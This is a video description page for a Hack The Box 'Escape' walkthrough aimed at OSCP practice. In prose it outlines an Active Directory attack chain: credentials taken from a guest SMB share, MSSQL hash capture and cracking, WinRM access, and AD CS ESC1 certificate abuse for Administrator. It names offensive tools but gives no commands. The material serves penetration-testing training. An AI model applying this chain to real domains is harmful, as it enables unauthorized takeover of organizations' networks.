Escape - Hackthebox (OSCP Prep)

Channel:
United States NoxLumens
Subscribers:
1,270
Published on ● Video Link: https://www.youtube.com/watch?v=Np2B5iHkirg


Duration: 53:16
135 views
4

Welcome to my Escape video from hackthebox, this one has been done over and over again but not by me and though I might use the same attacks or tools it's novel to me. I completed this one a very long time ago when it came out but decided I need to go back over it since I had forgotten the way in and it's a part of tjnulls list of recommended boxes that are OSCP-like
The point of these videos and live streams are to learn and have a good time. I'm streaming this content not because I'm an expert but because I'm here to learn and put myself out there.

Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user `ryan.cooper`. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.

Skills Required:
- Enumeration
- Windows Active Directory
- Microsoft SQL server

Skills Learned:
- Kerberos Authentication
- ESC1 attack
- NTLM Authentication

Vulnerabilities:
- Misconfiguration
- Active Directory Certificate Services ESC1
- Anonymous/Guest Access

Tools:
- rustscan
- impacket
- johntheripper
- hashcat
- Certipy
- evil-winrm
- smbclient
- smbmap

Certifications:
Practical Network Penetration Tester (PNPT) : TCM Security - https://certifications.tcm-sec.com/pnpt/
Practical Junior Penetration Tester (PJPT): TCM Security - https://certifications.tcm-sec.com/pjpt/
Practical Junior Web Tester (PJWT): TCM Security - https://certifications.tcm-sec.com/pjwt/
Certified Ethical Hacker (CEH): EC-Council
--------------------
Socials:
Tryhackme: https://tryhackme.com/p/NoxLumens
Hackthebox: https://app.hackthebox.com/profile/179139
Twitch: https://twitch.tv/noxlumens



Other Videos By NoxLumens


2024-03-28Broker - Hackthebox OSCP Prep TJ Nulls
2024-03-27Updown - Hackthebox - OSCP Prep TJ Nulls
2024-03-26Soccer - Hackthebox (OSCP Prep) TJ Nulls - Tiny File Manager CVE, Websocket SQLI, Sticky Bits SUID
2024-03-19Blackfield - Hackthebox (OSCP Prep) TJ Nullls
2024-03-16Busqueda - Hackthebox (OSCP Prep) - TJ Nulls
2024-03-15Intelligence - HacktheBox (OSCP Prep) - TJ Nulls
2024-03-14StreamIO - Hackthebox
2024-03-08How I impersonated A State Governor to Teach My Co-Workers A Lesson - How I Create Phishing Emails
2024-03-06Support - HacktheBox (OSCP Prep) - TJ NULLS
2024-03-05Servmon - Hackthebox (OSCP Prep)
2024-03-04Escape - Hackthebox (OSCP Prep)
2024-03-03catchGame
2024-03-03100 SUBS! - Am I a "l33t" Hacker Yet?
2024-02-24Active - Hackthebox (OSCP Prep)
2024-02-23OSCP Practice: Proving Grounds CTF-200-08
2024-02-23Offsec Proving Grounds: CTF-200-07, CTF-200-08
2024-02-22OSCP Practice: Proving Grounds CTF-200-07
2024-02-21OSCP Practice: Proving Grounds CTF-200-03
2024-02-20Offsec Proving Grounds: CTF-200-04, CTF-200-05, CTF-200-06
2024-02-20OSCP Practice: Proving Grounds CTF-200-06
2024-02-19OSCP Practice: Proving Grounds CTF-200-05


Tags:
noxlumens
noxlumen
hacking
cyber security
oscp
oscp prep
kali linux
hacker
cyber
malware
active directory
pentesting
web app pentesting
network pentesting
ctf
cyber ctf
offsec
offsec oscp
gobuster
ad pentesting
active directory pentesting
enumeration
hackthebox
netexec
active hackthebox
tjnulls
tj nulls oscp
ldap enumeration
ldap hacking
escape hackthebox
escape ctf
escape
adcs esc1
adcs
active directory certificate service escalation 1
escape tj nulls